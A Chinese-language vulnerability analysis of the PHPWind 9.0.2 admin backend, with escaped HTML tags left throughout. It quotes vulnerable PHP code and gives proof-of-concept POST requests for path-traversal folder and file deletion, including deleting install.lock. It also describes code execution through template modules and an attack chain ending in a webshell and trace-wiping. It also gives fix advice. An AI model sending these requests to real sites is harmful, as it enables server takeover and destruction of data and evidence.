PHPWind 9.0.2 后台漏洞分析与利用指南<\/h1>

0x01 漏洞概述<\/h2>
PHPWind 9.0.2 后台存在多个高危漏洞，包括：<\/p>
任意文件夹删除漏洞<\/li>
任意文件删除漏洞<\/li>
代码执行漏洞<\/li> <\/ol>
这些漏洞可导致攻击者在获取后台权限后完全控制服务器。<\/p>
0x02 漏洞详细分析<\/h2>

0x02_1 任意文件夹删除漏洞<\/h3>
漏洞文件<\/strong>：\/src\/applications\/backup\/admin\/BackupController.php<\/code><\/p>
漏洞代码<\/strong>（105-119行）：<\/p>
public<\/span> function<\/span> batchdeleteAction<\/span>() {
<\/span><\/span>    $files =<\/span> $this-><\/span>getInput<\/span>('files'<\/span>);
<\/span><\/span>    !<\/span>$files &&<\/span> $this-><\/span>showError<\/span>('BACKUP:name.empty'<\/span>);
<\/span><\/span>    foreach<\/span>($files as<\/span> $value){
<\/span><\/span>        $value =<\/span> WindSecurity<\/span>::<\/span>escapePath<\/span>($value);
<\/span><\/span>        if<\/span> (!<\/span>$value) continue<\/span>;
<\/span><\/span>        if<\/span>(preg_match<\/span>('\/^(\w{8}_pw_[^_]+_\d{14})(.*)(sql|zip)$\/i'<\/span>, $value)){
<\/span><\/span>            $deletePath =<\/span> $this-><\/span>_bakupDir<\/span> .<\/span> $value;
<\/span><\/span>            WindFile<\/span>::<\/span>del<\/span>($deletePath);
<\/span><\/span>        }elseif<\/span> (preg_match<\/span>('\/^\w{8}_pw_d{14})\/i'<\/span>, $value)) {
<\/span><\/span>            WindFolder<\/span>::<\/span>rm<\/span>($this-><\/span>_bakupDir<\/span> .<\/span> $value,true<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    $this-><\/span>showMessage<\/span>('success'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点分析<\/strong>：<\/p>

WindSecurity::escapePath()<\/code> 函数未过滤 ..\/<\/code> 目录遍历字符<\/li>
正则表达式 (.*)<\/code> 允许任意字符，可构造路径遍历<\/li>
<\/ol>
安全函数缺陷<\/strong>：

\/wind\/utility\/WindSecurity.php<\/code> 中的 escapePath()<\/code> 函数：<\/p>
public<\/span> static<\/span> function<\/span> escapePath<\/span>($filePath, $ifCheck =<\/span> false<\/span>) {
<\/span><\/span>    $_tmp =<\/span> array<\/span>("<\/span>\0<\/span>"<\/span> =><\/span> ''<\/span>);
<\/span><\/span>    if<\/span> ($ifCheck &&<\/span> strtr<\/span>($filePath, $_tmp) ==<\/span> $filePath) {
<\/span><\/span>        return<\/span> preg_replace<\/span>('\/[^\w\-\.]\/i'<\/span>, ''<\/span>, $filePath);
<\/span><\/span>    }
<\/span><\/span>    throw<\/span> new<\/span> WindException<\/span>('[utility.WindSecurity.escapePath] file path is illegal'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x02_2 任意文件删除漏洞<\/h3>
漏洞文件<\/strong>：\/src\/applications\/appcenter\/admin\/AppController.php<\/code><\/p>
漏洞代码<\/strong>（182-188行）：<\/p>
public<\/span> function<\/span> delFileAction<\/span>() {
<\/span><\/span>    $file =<\/span> $this-><\/span>getInput<\/span>('file'<\/span>, 'post'<\/span>);
<\/span><\/span>    if<\/span> ($file &&<\/span> file_exists<\/span>(ATTACH_PATH<\/span> .<\/span> $file)) {
<\/span><\/span>        WindFile<\/span>::<\/span>del<\/span>(ATTACH_PATH<\/span> .<\/span> $file);
<\/span><\/span>    }
<\/span><\/span>    $this-><\/span>showMessage<\/span>('success'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点分析<\/strong>：<\/p>

无任何路径过滤<\/li>
可通过 ..\/<\/code> 遍历到任意目录<\/li>
开发错误导致 ATTACH_PATH<\/code> 与实际路径不匹配，但仍可利用<\/li>
<\/ol>
0x02_3 代码执行漏洞<\/h3>
漏洞位置<\/strong>：

后台 => 门户 => 模板管理 => 添加模块<\/p>
漏洞描述<\/strong>：<\/p>

插入的代码会被写入数据库<\/li>
通过"调用代码"功能时，代码会被执行<\/li>
<\/ol>
0x03 漏洞利用方法<\/h2>
任意文件夹删除漏洞利用<\/h3>
POC 1<\/strong>：<\/p>
POST \/admin.php?m=backup&c=backup&a=batchdelete HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
Cookie: [有效的后台cookie]

files[]=YXYJjQpA_pw_9-0-2_20190117162037\/coolcat\/&csrf_token=[有效的token]
<\/code><\/pre>
POC 2<\/strong>：<\/p>
POST \/admin.php?m=appcenter&c=app&a=delFolder HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
Cookie: [有效的后台cookie]

csrf_token=[有效的token]&folder=demo\/coolcat\/
<\/code><\/pre>
任意文件删除漏洞利用<\/h3>
POC<\/strong>：<\/p>
POST \/admin.php?m=appcenter&c=app&a=delFile HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
Cookie: [有效的后台cookie]

csrf_token=[有效的token]&file=\/..\/data\/install.lock
<\/code><\/pre>
代码执行漏洞利用<\/h3>

登录后台<\/li>
导航到：门户 => 模板管理 => 添加模块<\/li>
插入恶意PHP代码<\/li>
通过"调用代码"功能执行代码<\/li>
<\/ol>
0x04 修复建议<\/h2>

升级到最新版本<\/li>
临时修复方案：

修改 WindSecurity::escapePath()<\/code> 函数，过滤 ..\/<\/code><\/li>
严格限制文件删除操作的路径范围<\/li>
对模板代码进行严格过滤<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 总结<\/h2>
PHPWind 9.0.2 后台存在多个高危漏洞，攻击链如下：<\/p>

通过其他漏洞获取后台权限（如SQL注入）<\/li>
利用代码执行漏洞获取Webshell<\/li>
利用文件删除漏洞清除痕迹或破坏系统<\/li>
<\/ol>
管理员应及时更新系统并检查服务器安全状况。<\/p>